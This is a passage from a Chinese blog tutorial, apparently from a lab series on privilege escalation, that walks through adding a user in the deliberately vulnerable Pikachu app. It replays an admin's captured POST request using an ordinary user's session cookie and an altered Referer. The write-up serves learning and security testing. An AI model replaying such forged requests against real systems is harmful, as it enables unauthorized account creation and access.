欢迎您访问 最编程 本站为您分享编程语言代码,编程技术文章!
您现在的位置是: 首页

(33) [横向和纵向越轨专题]越轨的原理、原因、危害和利用漏洞的过程 ......

最编程 2024-07-02 10:02:10
...

 7.2.3、第三步:实现越权添加用户

再来看看提交数据时的数据包

使用admin(高权限)提交的表

POST /pikachu-master/vul/overpermission/op2/op2_admin_edit.php HTTP/1.1

……

username=test&password=000000&sex=%E7%94%B7&phonenum=1111111&email=%40qq.com&address=beijing&submit=%E5%88%9B%E5%BB%BA

使用pikachu(普通用户)的session执行添加操作

来的地址,是登录,这一步登录就变成修改了

(感觉就是伪造数据包)

Referer: http://localhost:8080/pikachu-master/vul/overpermission/op2/op2_login.php

然后请求方法和URL都改为修改时候的URL

POST /pikachu-master/vul/overpermission/op2/op2_admin_edit.php HTTP/1.1

使用的是pikachu的cookie

Cookie: PHPSESSID=tb9nagh7k6bteg9hj288pfh481

放包后再查看,就已经添加成功了

 (这不就是数据包伪造嘛,不过他确实越权了,这个名字取的没毛病)